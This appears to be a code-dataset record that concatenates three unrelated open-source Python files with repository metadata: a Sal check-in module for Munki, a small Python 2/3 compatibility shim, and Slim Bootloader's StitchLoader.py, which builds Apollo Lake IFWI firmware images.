munki_submission["managed_items"] = {} optional_manifest = get_optional_manifest() for item in munki_report.get("ManagedInstalls", []): submission_item = {"date_managed": now} submission_item["status"] = "PRESENT" if item["installed"] else "PENDING" version_key = ( "version_to_install" if not item["installed"] else "installed_version" ) version = item[version_key] name = f'{item["name"]} {version}' submission_item["name"] = name # Pop off these two since we already used them. item.pop("name") item.pop("installed") item["type"] = "ManagedInstalls" self_serve = ( "True" if name in optional_manifest.get("managed_installs", []) else "False" ) item["self_serve"] = self_serve submission_item["data"] = item munki_submission["managed_items"][name] = submission_item for item in munki_report.get("managed_uninstalls_list", []): submission_item = {"date_managed": now, "status": "ABSENT"} self_serve = ( "True" if name in optional_manifest.get("managed_uninstalls", []) else "False" ) submission_item["data"] = { "self_serve": self_serve, "type": "ManagedUninstalls", } munki_submission["managed_items"][item] = submission_item # Process InstallResults and RemovalResults into update history for report_key in ("InstallResults", "RemovalResults"): for item in munki_report.get(report_key, []): # Skip Apple software update items. if item.get("applesus"): continue # Construct key; we pop the name off because we don't need # to submit it again when we stuff `item` into `data`. name = f'{item.pop("name")} {item["version"]}' submission_item = munki_submission["managed_items"].get( name, {"name": name} ) if item.get("status") != 0: # Something went wrong, so change the status. 
submission_item["status"] = "ERROR" if "data" in submission_item: submission_item["data"].update(item) else: submission_item["data"] = item if "type" not in submission_item["data"]: submission_item["data"]["type"] = ( "ManagedInstalls" if report_key == "InstallResults" else "ManagedUninstalls" ) # This UTC datetime gets converted to a naive datetime by # plistlib. Fortunately, we can just tell it that it's UTC. submission_item["date_managed"] = ( item["time"].replace(tzinfo=datetime.timezone.utc).isoformat() ) munki_submission["managed_items"][name] = submission_item sal.set_checkin_results("Munki", munki_submission) def get_managed_install_report(): """Return Munki ManagedInstallsReport.plist as a plist dict. Returns: ManagedInstalls report for last Munki run as a plist dict, or an empty dict. """ # Checks munki preferences to see where the install directory is set to. managed_install_dir = munkicommon.pref("ManagedInstallDir") # set the paths based on munki's configuration. managed_install_report = ( pathlib.Path(managed_install_dir) / "ManagedInstallReport.plist" ) try: munki_report = plistlib.loads(managed_install_report.read_bytes()) except (IOError, plistlib.InvalidFileException): munki_report = {} if "MachineInfo" not in munki_report: munki_report["MachineInfo"] = {} return sal.unobjctify(munki_report) def get_optional_manifest(): """Return Munki SelfServeManifest as a plist dict. Returns: SelfServeManifest for last Munki run as a plist dict, or an empty dict. """ # Checks munki preferences to see where the install directory is set to. managed_install_dir = munkicommon.pref("ManagedInstallDir") # set the paths based on munki's configuration. optional_manifest_path = ( pathlib.Path(managed_install_dir) / "manifests/SelfServeManifest" ) try: optional_manifest = plistlib.loads(optional_manifest_path.read_bytes()) except (IOError, plistlib.InvalidFileException): optional_manifest = {} return optional_manifest if __name__ == "__main__": main()
35.370968
91
0.622739
import datetime import pathlib import plistlib import sys import sal sys.path.insert(0, "/usr/local/munki") from munkilib import munkicommon __version__ = "1.2.0" def main(): # munki section rather than start from scratch, as we want to # keep any install/removal history that may be there. munki_submission = sal.get_checkin_results().get("munki", {}) munki_report = get_managed_install_report() extras = {} extras["munki_version"] = munki_report["MachineInfo"].get("munki_version") extras["manifest"] = munki_report.get("ManifestName") extras["runtype"] = munki_report.get("RunType", "custom") munki_submission["extra_data"] = extras munki_submission["facts"] = { "checkin_module_version": __version__, "RunType": munki_report["RunType"], "StartTime": munki_report["StartTime"], "EndTime": munki_report["EndTime"], } if munki_report.get("Conditions"): for condition, value in munki_report["Conditions"].items(): # Join lists of strings into a comma-delimited string, as # the server wants just text. try: if hasattr(value, "append"): value = ", ".join(value) except Exception as e: # We god something weird from a condtion that probably wouldn't work anyway continue munki_submission["facts"][condition] = value munki_submission["messages"] = [] for key in ("Errors", "Warnings"): for msg in munki_report[key]: munki_submission["messages"].append( {"message_type": key.upper()[:-1], "text": msg} ) now = datetime.datetime.now().astimezone(datetime.timezone.utc).isoformat() # Process managed items and update histories. 
munki_submission["managed_items"] = {} optional_manifest = get_optional_manifest() for item in munki_report.get("ManagedInstalls", []): submission_item = {"date_managed": now} submission_item["status"] = "PRESENT" if item["installed"] else "PENDING" version_key = ( "version_to_install" if not item["installed"] else "installed_version" ) version = item[version_key] name = f'{item["name"]} {version}' submission_item["name"] = name # Pop off these two since we already used them. item.pop("name") item.pop("installed") item["type"] = "ManagedInstalls" self_serve = ( "True" if name in optional_manifest.get("managed_installs", []) else "False" ) item["self_serve"] = self_serve submission_item["data"] = item munki_submission["managed_items"][name] = submission_item for item in munki_report.get("managed_uninstalls_list", []): submission_item = {"date_managed": now, "status": "ABSENT"} self_serve = ( "True" if name in optional_manifest.get("managed_uninstalls", []) else "False" ) submission_item["data"] = { "self_serve": self_serve, "type": "ManagedUninstalls", } munki_submission["managed_items"][item] = submission_item # Process InstallResults and RemovalResults into update history for report_key in ("InstallResults", "RemovalResults"): for item in munki_report.get(report_key, []): # Skip Apple software update items. 
if item.get("applesus"): continue # Construct key; we pop the name off because we don't need name = f'{item.pop("name")} {item["version"]}' submission_item = munki_submission["managed_items"].get( name, {"name": name} ) if item.get("status") != 0: submission_item["status"] = "ERROR" if "data" in submission_item: submission_item["data"].update(item) else: submission_item["data"] = item if "type" not in submission_item["data"]: submission_item["data"]["type"] = ( "ManagedInstalls" if report_key == "InstallResults" else "ManagedUninstalls" ) submission_item["date_managed"] = ( item["time"].replace(tzinfo=datetime.timezone.utc).isoformat() ) munki_submission["managed_items"][name] = submission_item sal.set_checkin_results("Munki", munki_submission) def get_managed_install_report(): # Checks munki preferences to see where the install directory is set to. managed_install_dir = munkicommon.pref("ManagedInstallDir") # set the paths based on munki's configuration. managed_install_report = ( pathlib.Path(managed_install_dir) / "ManagedInstallReport.plist" ) try: munki_report = plistlib.loads(managed_install_report.read_bytes()) except (IOError, plistlib.InvalidFileException): munki_report = {} if "MachineInfo" not in munki_report: munki_report["MachineInfo"] = {} return sal.unobjctify(munki_report) def get_optional_manifest(): managed_install_dir = munkicommon.pref("ManagedInstallDir") optional_manifest_path = ( pathlib.Path(managed_install_dir) / "manifests/SelfServeManifest" ) try: optional_manifest = plistlib.loads(optional_manifest_path.read_bytes()) except (IOError, plistlib.InvalidFileException): optional_manifest = {} return optional_manifest if __name__ == "__main__": main()
true
true
f705c7a4e86112d7fbf69a0db1bd54f293460d18
200
py
Python
jscaller/_compatiable.py
ZSAIm/PyJSCaller
086b3a0bf57f9c42c4d9c3cea6e7cdad5f52059d
[ "Apache-2.0" ]
31
2019-05-06T03:07:58.000Z
2022-02-09T02:00:46.000Z
jscaller/_compatiable.py
zackmark29/PyJSCaller
086b3a0bf57f9c42c4d9c3cea6e7cdad5f52059d
[ "Apache-2.0" ]
1
2019-07-05T12:43:34.000Z
2019-07-26T08:22:19.000Z
jscaller/_compatiable.py
zackmark29/PyJSCaller
086b3a0bf57f9c42c4d9c3cea6e7cdad5f52059d
[ "Apache-2.0" ]
10
2019-05-07T06:35:21.000Z
2021-09-27T02:48:40.000Z
__all__ = ["PY2", "PY3"] import sys if sys.version_info[0] == 2: PY2 = True PY3 = False elif sys.version_info[0] == 3: PY2 = False PY3 = True else: PY2 = False PY3 = False
12.5
30
0.56
__all__ = ["PY2", "PY3"] import sys if sys.version_info[0] == 2: PY2 = True PY3 = False elif sys.version_info[0] == 3: PY2 = False PY3 = True else: PY2 = False PY3 = False
true
true
f705c7f93432895a83a22e63702790a8a3602602
25,944
py
Python
Platform/ApollolakeBoardPkg/Script/StitchLoader.py
aimanrosli23/slimbootloader
bce49fbc5ac125cccf4f647e786409f49a026769
[ "BSD-2-Clause-NetBSD", "PSF-2.0", "BSD-2-Clause", "Apache-2.0", "MIT", "BSD-2-Clause-Patent" ]
1
2022-03-04T18:23:35.000Z
2022-03-04T18:23:35.000Z
Platform/ApollolakeBoardPkg/Script/StitchLoader.py
aimanrosli23/slimbootloader
bce49fbc5ac125cccf4f647e786409f49a026769
[ "BSD-2-Clause-NetBSD", "PSF-2.0", "BSD-2-Clause", "Apache-2.0", "MIT", "BSD-2-Clause-Patent" ]
null
null
null
Platform/ApollolakeBoardPkg/Script/StitchLoader.py
aimanrosli23/slimbootloader
bce49fbc5ac125cccf4f647e786409f49a026769
[ "BSD-2-Clause-NetBSD", "PSF-2.0", "BSD-2-Clause", "Apache-2.0", "MIT", "BSD-2-Clause-Patent" ]
null
null
null
## @ StitchLoader.py # This is a python stitching script for Slim Bootloader APL build # # Copyright (c) 2018 - 2022, Intel Corporation. All rights reserved. <BR> # SPDX-License-Identifier: BSD-2-Clause-Patent # ## import os import re import sys import struct import argparse import zipfile import shutil from ctypes import * from subprocess import check_output from functools import reduce sys.dont_write_bytecode = True sblopen_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), '../../../')) if not os.path.exists (sblopen_dir): sblopen_dir = os.getenv('SBL_SOURCE', '') sys.path.append (os.path.join(sblopen_dir, 'BootloaderCorePkg' , 'Tools')) try: from IfwiUtility import * except ImportError: err_msg = "Cannot find IfwiUtility module!\n" err_msg += "Please make sure 'SBL_SOURCE' environment variable is set to open source SBL root folder." raise ImportError(err_msg) extra_usage_txt = \ """This script creates a new Apollo Lake Slim Bootloader IFWI image basing on an existing IFWI base image. Please note, this stitching method will work only if Boot Guard in the base image is not enabled, and the silicon is not fused with Boot Guard enabled. Please follow steps below: 1. Download an existing Apollo Lake UEFI IFWI image associated with the target platform, such as MinnowBoard 3, LeafHill, etc. The URL is below: https://firmware.intel.com/projects/minnowboard3 Alternatively, the original IFWI image from the onboard SPI flash can be read out as the base image too. 2. Build Slim Bootloader source tree and generate a stitching ZIP package. The generated ZIP package is located at: $(WORKSPACE)/Outputs/apl/Stitch_Components.zip 3. Stitch to create a new IFWI image. EX: python StitchLoader.py -i LEAFHILD.X64.0070.R01.1805070352.bin -s Stitch_Components.zip -o SlimBoot.bin 4. Optionally, to view the flash layout for an given IFWI image, specify '-i' option only. 
EX: python StitchLoader.py -i LEAFHILD.X64.0070.R01.1805070352.bin """ FILE_ALIGN = 0x1000 class IFWI_MANIPULATE: def add_component (self, root, path, before = '$', file_path = ''): nodes = path.split('/') parent_path = '/'.join(nodes[:-1]) dir_comp = IFWI_PARSER.locate_component (root, parent_path) if not dir_comp: print ('Cannot find DIR %s !' % '/'.join(nodes[:-1])) return -1 if dir_comp.type != COMPONENT.COMP_TYPE['PART']: print ('Can only add FILE type !') return -2 index = None if before == '$': # Add to end index = len(dir_comp.child) elif before == '^': # Add to top index = 0 else: for idx, file in enumerate(dir_comp.child): if before == file.name: index = idx if index is None: print ('Cannot find FILE %s !' % before) return -3 else: length = os.path.getsize(file_path) if file_path else 0x1000 comp = COMPONENT (nodes[-1], COMPONENT.COMP_TYPE['FILE'], 0, length) comp.set_data (file_path) dir_comp.add_child (comp, index) return 0 def remove_component (self, root, path): nodes = path.split('/') parent_path = '/'.join(nodes[:-1]) dir_comp = IFWI_PARSER.locate_component (root, parent_path) if not dir_comp: print ('Cannot find DIR %s !' % '/'.join(nodes[:-1])) return -1 if dir_comp.type != COMPONENT.COMP_TYPE['PART']: print ('Can only replace FILE type !') return -2 index = None for idx, file in enumerate(dir_comp.child): if file.name == nodes[-1]: index = idx break if index is None: print ('Cannot find FILE %s !' % path) return -3 else: del dir_comp.child[index] return 0 def replace_component (self, root, path, file_path): comp = IFWI_PARSER.locate_component (root, path) if not comp: print ('Cannot find FILE %s !' % path) return -1 if comp.type != COMPONENT.COMP_TYPE['FILE']: print ('Can only replace FILE type !' 
% path) return -2 comp.length = os.path.getsize(file_path) if file_path else 0x1000 if file_path: comp.set_data (file_path) return 0 def copy_component (self, root, path, ifwi_data): print ("COPY BP0 BPDT to BP1 BPDT ...") # Backup BP0 BPDT and BP1 SBPDT bp1 = IFWI_PARSER.locate_component (root, 'IFWI/BIOS/BP1') bp0bpdt = IFWI_PARSER.locate_component (root, 'IFWI/BIOS/BP0/BPDT') bp1bpdt = IFWI_PARSER.locate_component (root, 'IFWI/BIOS/BP1/BPDT') bp1sbpdt = IFWI_PARSER.locate_component (root, 'IFWI/BIOS/BP1/SBPDT') bp0bpdt_data = bytearray(ifwi_data[bp0bpdt.offset :bp0bpdt.offset + bp0bpdt.length]) bp1sbpdt_data = bytearray(ifwi_data[bp1sbpdt.offset:bp1sbpdt.offset + bp1sbpdt.length]) # Copy to BP0 BPDT to BP1 BPDT bp1sbpdt_offset = bp1bpdt.offset + bp0bpdt.length ifwi_data[bp1bpdt.offset:bp1sbpdt_offset] = bp0bpdt_data # Append original BP1 SBPDT bp1sbpdt_end_offset = bp1sbpdt_offset + bp1sbpdt.length ifwi_data[bp1sbpdt_offset:bp1sbpdt_end_offset] = bp1sbpdt_data padding = bp1.offset + bp1.length - bp1sbpdt_end_offset if padding < 0: print ('Insufficiant space in BP1 partition !') return -1 ifwi_data[bp1sbpdt_end_offset:bp1sbpdt_end_offset + padding] = b'\xff' * padding # Fix Sbpdt length in BP1 BPDT offset = bp1bpdt.offset bpdt_hdr = BPDT_HEADER.from_buffer(ifwi_data, offset) offset += sizeof(BPDT_HEADER) for idx in range(bpdt_hdr.desc_cnt): bpdt_entry = BPDT_ENTRY.from_buffer(ifwi_data, offset) if "BpdtSbpdt" == str(bpdt_entry.type): bpdt_entry.sub_part_size = bp1sbpdt.length offset += sizeof(BPDT_ENTRY) # Fix Sbpdt headers offset = bp1sbpdt_offset bpdt_hdr = BPDT_HEADER.from_buffer(ifwi_data, offset) offset += sizeof(BPDT_HEADER) for idx in range(bpdt_hdr.desc_cnt): bpdt_entry = BPDT_ENTRY.from_buffer(ifwi_data, offset) bpdt_entry.sub_part_offset += (bp0bpdt.length - bp1bpdt.length) offset += sizeof(BPDT_ENTRY) print ("Done!") return 0 def create_dir_data (self, dir, ifwi_data): # Claculate new DIR length and creaet new DIR data support_list = ["BpdtIbb", 
"BpdtObb"] if dir.name not in support_list: raise Exception ('Only %s are supported !' % ' '.join(support_list)) adjust = True offset = len(dir.child) * sizeof(SUBPART_DIR_ENTRY) + sizeof(SUBPART_DIR_HEADER) sub_dir_hdr = SUBPART_DIR_HEADER.from_buffer(ifwi_data, dir.offset) dir_data = bytearray(sub_dir_hdr) + b'\xff' * (offset - sizeof(SUBPART_DIR_HEADER)) for idx, comp in enumerate(dir.child): delta = 0 parts = os.path.splitext(comp.name) if len(parts) > 1 and parts[1] in ['.man', '.met']: align = 1 elif comp.name in ['IPAD', 'OPAD']: align = 0x40 else: align = FILE_ALIGN delta = dir.offset & (FILE_ALIGN - 1) next_offset = ((offset + delta + align - 1) & ~(align - 1)) count = next_offset - offset if adjust: adjust = False count -= delta dir_data.extend(b'\xff' * count) comp_data = comp.get_data() if comp_data: dir_data.extend(comp_data) else: dir_data.extend(ifwi_data[comp.offset : comp.offset + comp.length]) sub_dir = SUBPART_DIR_ENTRY() sub_dir.entry_name = comp.name.encode() sub_dir.entry_offset = next_offset - delta sub_dir.entry_size = comp.length sub_dir.reserved1 = 0 sub_dir.reserved2 = 0 entry_offset = idx * sizeof(SUBPART_DIR_ENTRY) + sizeof(SUBPART_DIR_HEADER) dir_data[entry_offset:entry_offset+sizeof(SUBPART_DIR_ENTRY)] = bytearray(sub_dir) next_offset += comp.length offset = next_offset align = FILE_ALIGN next_offset = ((offset + align - 1) & ~(align - 1)) dir_data.extend(b'\xff' * (next_offset - offset)) # Update checksum sub_dir_hdr = SUBPART_DIR_HEADER.from_buffer_copy(dir_data) sub_dir_hdr.num_of_entries = len(dir.child) sub_dir_hdr.checksum = 0 dir_data[:sizeof(SUBPART_DIR_HEADER)] = bytearray(sub_dir_hdr) length = sub_dir_hdr.num_of_entries * sizeof(SUBPART_DIR_ENTRY) + sizeof(SUBPART_DIR_HEADER) sum_buf = (c_uint8 * length).from_buffer_copy(dir_data) sub_dir_hdr.checksum = (~sum(sum_buf) + 1) & 0xFF dir_data[:sizeof(SUBPART_DIR_HEADER)] = bytearray(sub_dir_hdr) remaining = (dir.offset + len(dir_data)) & (FILE_ALIGN - 1) if remaining: # Not page 
aligned, add padding dir_data.extend(b'\xff' * (FILE_ALIGN - remaining)) return dir_data def refresh_ifwi_for_dir (self, dir, ifwi_data): # Claculate new DIR length and creaet new DIR data dir_data = self.create_dir_data (dir, ifwi_data) length = len (dir_data) adjust_length = length - dir.length if (dir.offset + length) & (FILE_ALIGN - 1): print ('DIR total size needs to be 4KB aligned !') # Remember original SBPDT offset org_bpdt_offset = dir.parent.parent.child[0].offset org_sbpdt_offset = dir.parent.parent.child[1].offset # Adjust offset and size for peer and up level in tree old_dir = dir while dir.type != COMPONENT.COMP_TYPE['BP']: for each in dir.parent.child: if each.offset > dir.offset: each.offset += adjust_length dir.length += adjust_length dir = dir.parent dir = old_dir # Update parent BPDT header info in IFWI data parent = dir.parent bpdt_hdr = BPDT_HEADER.from_buffer(ifwi_data, parent.offset) base = parent.offset + sizeof(BPDT_HEADER) found = False for idx in range(bpdt_hdr.desc_cnt): bpdt_entry = BPDT_ENTRY.from_buffer(ifwi_data, base + idx * sizeof(BPDT_ENTRY)) comps = [x for x in parent.child if x.name == str(bpdt_entry.type)] if len(comps) == 0: continue if len(comps) > 1: raise Exception ('Found duplicated DIR %s !', bpdt_entry.type) bpdt_entry.sub_part_offset = comps[0].offset - parent.parent.offset if dir.name == str(bpdt_entry.type): bpdt_entry.sub_part_size = length found = True if not found: raise Exception ('Could not find DIR %s !', dir.name) # Update SBPDT DIR header in IFWI data bp_comp = parent.parent if parent.name == 'BPDT': bpdt_hdr = BPDT_HEADER.from_buffer (ifwi_data, org_sbpdt_offset) bpdt_hdr.xor_sum = 0 base_offset = org_sbpdt_offset + sizeof(BPDT_HEADER) for idx in range(bpdt_hdr.desc_cnt): bpdt_entry = BPDT_ENTRY.from_buffer(ifwi_data, base_offset + idx * sizeof(BPDT_ENTRY)) bpdt_entry.sub_part_offset += adjust_length if (bpdt_entry.sub_part_offset + bpdt_entry.sub_part_size) > bp_comp.length: raise Exception ('Insufficiant 
space in layout !') else: # 'SBPDT', update length in BPDT bpdt_hdr = BPDT_HEADER.from_buffer (ifwi_data, org_bpdt_offset) bpdt_hdr.xor_sum = 0 base_offset = org_bpdt_offset + sizeof(BPDT_HEADER) for idx in range(bpdt_hdr.desc_cnt): bpdt_entry = BPDT_ENTRY.from_buffer(ifwi_data, base_offset + idx * sizeof(BPDT_ENTRY)) if str(bpdt_entry.type) == "BpdtSbpdt": bpdt_entry.sub_part_size += adjust_length if (bpdt_entry.sub_part_offset + bpdt_entry.sub_part_size) > bp_comp.length: raise Exception ('Insufficiant space in layout !') # Generate actual final IFWI Data if adjust_length > 0: ifwi_data[:] = ifwi_data[:old_dir.offset] + dir_data + \ ifwi_data[old_dir.offset + old_dir.length - adjust_length : bp_comp.offset + bp_comp.length - adjust_length] + \ ifwi_data[bp_comp.offset + bp_comp.length:] else: adjust_length = -adjust_length ifwi_data[:] = ifwi_data[:old_dir.offset] + dir_data + \ ifwi_data[old_dir.offset + old_dir.length + adjust_length: bp_comp.offset + bp_comp.length] + \ b'\xff' * adjust_length + ifwi_data[bp_comp.offset + bp_comp.length:] return 0 def manipulate_ifwi (action, path, ifwi_data, file_name = '', before = '$'): print ('%s %s ...' 
% (action, path)) root = IFWI_PARSER.parse_ifwi_binary (ifwi_data) ifwi_op = IFWI_MANIPULATE() if action == "REMOVE": ret = ifwi_op.remove_component (root, path) elif action == "ADD": ret = ifwi_op.add_component (root, path, before, file_name) elif action == "REPLACE": ret = ifwi_op.replace_component (root, path, file_name) elif action == "COPY": ret = ifwi_op.copy_component (root, 'IFWI/BIOS/BP0/BPDT', ifwi_data) else: ret = -100 if ret == 0 and path: dir_path = '/'.join(path.split('/')[:-1]) dir = IFWI_PARSER.locate_component (root, dir_path) ifwi_op.refresh_ifwi_for_dir (dir, ifwi_data) print ('done!') return ret def patch_flash_map (image_data, platform_data = 0xffffffff): comp_bpdt_dict = { b'RSVD' : "IFWI/BIOS/BP1/SBPDT/BpdtObb/RSVD", b'IAS1' : "IFWI/BIOS/BP1/SBPDT/BpdtObb/FB", b'EPLD' : "IFWI/BIOS/BP1/SBPDT/BpdtObb/EPLD", b'UVAR' : "IFWI/BIOS/BP1/SBPDT/BpdtObb/UVAR", b'PYLD' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/PLD", b'VARS' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/VAR", b'MRCD' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/MRCD", b'CNFG' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/CFGD", b'KEYH' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/KEYH", b'FWUP' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/FWUP", b'SG02' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/OBB", b'SG1B' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/IBB", b'SG1A' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/IBBL", b'_BPM' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/BPM.met", } print ("Patching Slim Bootloader Flash Map table ...") output_image_data = image_data ifwi = IFWI_PARSER.parse_ifwi_binary (output_image_data) if not ifwi: return -1 pld = IFWI_PARSER.locate_component (ifwi, comp_bpdt_dict[b'PYLD']) if not pld: comp_bpdt_dict[b'PYLD'] = "IFWI/BIOS/BP1/SBPDT/BpdtObb/PLD" bp0 = IFWI_PARSER.locate_component (ifwi, 'IFWI/BIOS/BP0') bp1 = IFWI_PARSER.locate_component (ifwi, 'IFWI/BIOS/BP1') if not bp0 or not bp1: return -2 # Locate FlashMap offset for part in range(2): path = comp_bpdt_dict[b'SG1A'].replace("BP0", "BP%d" % part) comp = IFWI_PARSER.locate_component (ifwi, path) if not comp: if part == 0: raise 
Exception("Cannot locate %s !" % path) else: continue stage1AOffset = comp.offset stage1ALength = comp.length temp = stage1AOffset + stage1ALength - 8 c_uint32.from_buffer (output_image_data, temp - 4).value = platform_data fla_map_off = (bytes_to_value(output_image_data[temp:temp+4]) + stage1ALength) & 0xFFFFFFFF fla_map_str = FLASH_MAP.from_buffer (output_image_data, stage1AOffset + fla_map_off) entry_num = (fla_map_str.length - sizeof(FLASH_MAP)) // sizeof(FLASH_MAP_DESC) fla_map_str.romsize = bp0.length + bp1.length if part == 1: fla_map_str.attributes |= FLASH_MAP.FLASH_MAP_ATTRIBUTES['BACKUP_REGION'] for idx in range (entry_num): desc = FLASH_MAP_DESC.from_buffer (output_image_data, stage1AOffset + fla_map_off + sizeof(FLASH_MAP) + idx * sizeof(FLASH_MAP_DESC)) path = comp_bpdt_dict[desc.sig] if part == 1 or (desc.flags & FLASH_MAP.FLASH_MAP_DESC_FLAGS['NON_REDUNDANT']): path = path.replace("BP0", "BP1") if part == 1 and (desc.flags & FLASH_MAP.FLASH_MAP_DESC_FLAGS['REDUNDANT']): desc.flags |= FLASH_MAP.FLASH_MAP_DESC_FLAGS['BACKUP'] if desc.sig == b'RSVD': desc.offset = bp1.offset + bp1.length - desc.size - bp0.offset continue comp = IFWI_PARSER.locate_component (ifwi, path) if not comp: if desc.sig == b'KEYH': continue raise Exception("Cannot locate component '%s' in BPDT !" % path) if (desc.size == 0) and (desc.offset == 0): desc.size = comp.length desc.offset = comp.offset - bp0.offset continue if desc.size != comp.length and comp.name != 'FB': raise Exception("Mismatch component '%s' length in FlashMap and BPDT !" % comp_bpdt_dict[desc.sig]) if desc.sig not in [b'_BPM'] and (comp.offset & 0xFFF > 0): raise Exception("Component '%s' %x is not aligned at 4KB boundary, " \ "please adjust padding size for IPAD/OPAD in BoardConfig.py and rebuild !" 
% (comp_bpdt_dict[desc.sig], comp.offset)) desc.offset = comp.offset - bp0.offset # Last 4k in bios region is reserved for bootloader, throw Exception if any component falls in that range if (bp1.offset + bp1.length - 0x1000) <= (desc.offset + desc.size) <= (bp1.offset + bp1.length): raise Exception("Component '%s' offset is in bootloader reserved region, please try to reduce compoent size !" % comp_bpdt_dict[desc.sig]) limit = bp1.offset + bp1.length - bp0.offset - 0x40000 for idx in range (entry_num): desc = FLASH_MAP_DESC.from_buffer (output_image_data, stage1AOffset + fla_map_off + sizeof(FLASH_MAP) + idx * sizeof(FLASH_MAP_DESC)) if desc.sig == b'RSVD': continue # Last 256K flash space (4GB - 256KB to 4GB) is remapped to CSME read-only SRAM on APL # Directly access is not available. if desc.offset >= limit or desc.offset + desc.size > limit: print("WARNING: Component '%s' in BP%d is located inside CSME memory mapped region, direct access might fail." % (desc.sig, part)) print ("Flash map was patched successfully!") return 0 def create_ifwi_image (ifwi_in, ifwi_out, bios_out, platform_data, non_redundant, stitch_dir): redundant_payload = True ifwi_data = bytearray (get_file_data (ifwi_in)) root = IFWI_PARSER.parse_ifwi_binary (ifwi_data) if not root: raise Exception ('Invalid IFWI input image format !') # Verify if Boot Guard is enabled or not comp = IFWI_PARSER.locate_component (root, "IFWI/BIOS/BP0/BPDT/BpdtUepType") if not comp: raise Exception ('Unsupported base image format !') data = ifwi_data[comp.offset + 0x30:comp.offset + 0x32] if (data[0] & 0x0F) != 0x00: raise Exception ('Unsupported base image type. boot guard might have been enabled in this image !') print ('Creating %sredundant image ...' 
% ('non-' if non_redundant else '')) # Remove all in IBB/OBB remove_list = [ "IFWI/BIOS/BP0/BPDT/BpdtIbb", "IFWI/BIOS/BP1/BPDT/BpdtIbb", "IFWI/BIOS/BP1/SBPDT/BpdtObb" ] for dir_path in remove_list: comp = IFWI_PARSER.locate_component (root, dir_path) if not comp: continue for each in comp.child: if each.name.endswith('.man') or each.name.endswith('.met'): continue ret = manipulate_ifwi ('REMOVE', dir_path + '/' + each.name, ifwi_data) if ret != 0: raise Exception ('REMOVE failed (error code %d) !' % (ret)) # Copy BP0 BPDT into BP1 BPDT if not non_redundant: ret = manipulate_ifwi ('COPY', '', ifwi_data) if ret != 0: raise Exception ('COPY failed (error code %d) !' % (ret)) if stitch_dir: ibb_list = [ ('IBBL' , 'IBBL'), ('IBB' , 'IBBM'), ('OBB' , 'OBB'), ('FWUP' , 'FWU'), ('CFGD' , 'CFGDATA'), ('KEYH' , 'KEYHASH'), ('VAR' , 'VAR'), ('MRCD' , 'MRCDATA'), ('PLD' , 'PLD'), ] obb_list = [ ('FB' , 'FB'), ('EPLD' , 'EPLD'), ('UVAR' , 'UVAR'), ('PLD' , 'PLD'), ] # optional components opt_list = [ 'EPLD', 'UVAR' ] if redundant_payload: del obb_list[-1] else: del ibb_list[-1] bp1sbpdt = "IFWI/BIOS/BP1/SBPDT/BpdtObb/" loop = 1 if non_redundant else 2 for bp in range(loop): dir = "IFWI/BIOS/BP%d/BPDT/BpdtIbb/" % bp for comp_name, file_name in ibb_list: file_path = os.path.join(stitch_dir, 'Stitch_%s.bin' % file_name) ret = manipulate_ifwi ('ADD', dir + comp_name, ifwi_data, file_path) if ret != 0: raise Exception ('ADD failed (error code %d) !' % (ret)) for comp_name, file_name in obb_list: if file_name == '': file_path = '' else: file_path = os.path.join(stitch_dir, 'Stitch_%s.bin' % file_name) if (comp_name in opt_list) and not os.path.exists(file_path): ret = 0 else: ret = manipulate_ifwi ('ADD', bp1sbpdt + comp_name, ifwi_data, file_path) if ret != 0: raise Exception ('ADD failed (error code %d) !' 
% (ret)) patch_flash_map (ifwi_data, platform_data) if bios_out: print ('Creating BIOS image ...') bios = IFWI_PARSER.locate_component (root, 'IFWI/BIOS') fd = open (bios_out, 'wb') fd.write(ifwi_data[bios.offset:bios.offset+bios.length]) fd.close() print ('Creating IFWI image ...') fd = open (ifwi_out, 'wb') fd.write(ifwi_data) fd.close() print ('Done!') def print_ifwi_layout (ifwi_file): ifwi_parser = IFWI_PARSER () ifwi_bin = bytearray (get_file_data (ifwi_file)) ifwi = ifwi_parser.parse_ifwi_binary (ifwi_bin) if ifwi: ifwi_parser.print_tree (ifwi) else: print ('Invalid IFWI image') return 0 if __name__ == '__main__': hexstr = lambda x: int(x, 16) ap = argparse.ArgumentParser() ap.add_argument('-i', '--input-ifwi-file', dest='ifwi_in', type=str, required=True, help='specify input template IFWI image file path') ap.add_argument('-o', '--output-ifwi-file', dest='ifwi_out', type=str, default='', help='specify generated output IFWI image file path') ap.add_argument('-b', '--output-bios-region', dest='bios_out', type=str, default='', help='specify generated output BIOS region image file path') ap.add_argument('-s', '--sitch-zip-file', dest='stitch_in', type=str, default='', help='specify input sitching zip package file path') ap.add_argument('-p', '--platform-data', dest='plat_data', type=hexstr, default=0xFFFFFFFF, help='specify a platform specific data (HEX, DWORD) for customization') ap.add_argument('-n', '--non-redundant', dest='non_redundant', action="store_true", help='specify if the flash layout will be full redundant or not') if len(sys.argv) == 1: print('%s' % extra_usage_txt) args = ap.parse_args() if args.ifwi_out == '' and args.stitch_in == '': print_ifwi_layout (args.ifwi_in) sys.exit (0) else: if args.ifwi_out and args.stitch_in == '': ret = create_ifwi_image (args.ifwi_in, args.ifwi_out, args.bios_out, args.plat_data, args.non_redundant, None) sys.exit (ret) # Unpack files from zip print ("Unpacking sitching ZIP package ...") output_dir = 
os.path.dirname(args.ifwi_out) stitch_dir = os.path.join(output_dir, 'stitch_comp') if os.path.exists(stitch_dir): shutil.rmtree(stitch_dir) zf = zipfile.ZipFile(args.stitch_in, 'r', zipfile.ZIP_DEFLATED) zf.extractall(stitch_dir) zf.close() # Create new IFWI ret = create_ifwi_image (args.ifwi_in, args.ifwi_out, args.bios_out, args.plat_data, args.non_redundant, stitch_dir) # Remove extracted files if os.path.exists(stitch_dir): shutil.rmtree(stitch_dir) sys.exit (ret)
38.896552
154
0.590772
